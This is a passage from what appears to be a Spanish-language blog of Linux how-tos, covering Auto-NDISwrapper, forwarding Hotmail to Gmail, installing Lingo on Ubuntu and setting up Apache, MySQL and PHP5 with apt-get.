4. Ahora solo basta con que el programa detecte tu tarjeta y haga todas las funciones de las que ya hablamos, tendrás que aceptar la licencia de software propietario que se muestra cuando lo ejecutas, de otro modo se cerrará.

• Contribuye con el proyecto

Si eres un usuario que ya ha podido ejecutar Ndiswrapper satisfactoriamente puedes ayudar agregando tu tarjeta a la base de datos de Auto-NDISwrapper. Visita este sitio y llena los datos que correspondan, puedes obtenerlos con el comando “lsusb” o “lspci” para tarjetas PCI.

Yo veo un gran futuro para esta aplicación, siempre y cuando tenga el apoyo que se merece. Actualmente también hay una interfaz gráfica para Ndiswrapper aunque cuando la probé no me funcionó del todo bien y opté por la Termina.
Espero que les sea de utilidad.

De Hotmail a Gmail

Primer Paso: Registrar una cuenta(hotmail) con IzyMail

Segundo Paso: Entras a Gmail y sigues esta ruta:
1.Configuracion
2.Cuentas
3.Añadir Otra cuenta de Correo

Escribes tu correo hotmail y la contraseña de esa cuenta


Con esto ya se importan todos tus correo de Hotmail a Gmail y tambien los mensajes que te llegan de hotmail te llegaran a Gmail

Instala Lingo en Ubuntu

Los que conocen Lingo piensan que solo esta hecho para Win2 y que si soy usuario linux estoy obligado a usar esta Herramienta en Win2, estan equivocados ya que en la misma pagina hay versiones para linux, entonces solo basta con:
-Entrar aqui http://www.lindo.com/index.php?option=com_content&view=article&id=35&Itemid=20
-Registrarte
-Esperar a que te llegue la confirmacion a tu correo, y luego descargar el comprimido.

Una vez que ya tengas el lingo no es tan facil de levantar con doble click y listo pero no imposible.

Realiza estos pasos tal como se te indique:

Primer Paso:
Descomprimelo dentro de tu carpeta personal el directorio se llamara lingo1.

Segundo Paso(de aqui a adelante como root)

cd /home/tu_usuario/lingo11/license
source create_demo_license.sh

Esto te crea las licencias con sus codigos respectivos.
Tercer Paso:

cd /home/tu_usuario/lingo11/bin/linux32
chmod 755 *

LD_LIBRARY_PATH=$HOME/lingo11/bin/linux32:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH

LINGO_11_LICENSE_FILE=$HOME/lingo11/license/lndlng11.lic
export LINGO_11_LICENSE_FILE

Abres
nano /etc/ld.so.conf
y le agregas tu direccion:
include /home/tu_usuario/lingo11/bin/linux32
luego grabas cierras y digitas ldconfig

continuamos...

sigues en /home/tu_usuario/lingo11/bin/linux32>

source $HOME/lingo11/bin/linux32/lingovars.sh

./lingo11

y entraras a la consola del lingo a principo se nota muy rustica de usar sin embargo son los mismo comandos que se digitan lo mismo como lo hacias en win2 solo para ejecutar, configurar, integrar son puros comandos propios de lingo, los cuales puedes encontrarlos en lingo11/doc/lingo_user_manual.pdf apartir de la pagina 33

Nota: Para abrir otra vez el lingo te vas a la lingo11/bin/linux32>

source $HOME/lingo11/bin/linux32/lingovars.sh
./lingo11

Bueno el resultado es el siguiente:

Instala PHP + MySql +Apache en Ubuntu

Solo basta con abrir una terminal y digitar lo siguiente:

$ sudo apt-get install apache2
$ sudo apt-get install mysql-server
$ sudo apt-get install php5
$ sudo apt-get install libapache2-mod-php5 php5-gd php5-mysql

Si quieres tener el entorno web de Mysql digita esto:

$ sudo apt-get install phpmyadmin

Nota: Si cuando quieres abrir un archivo php en el apache y te sale para que lo descargues entonces digita lo siguiente:

$ apt-get install apache2 libapache2-mod-php5
$ apt-get install mysql-server mysql-server-5.0 libapache2-mod-auth-mysql php5-mysql

Y por ultimo resetea los servicios:
/etc/init.d/apache2 restart
/etc/init.d/mysql restart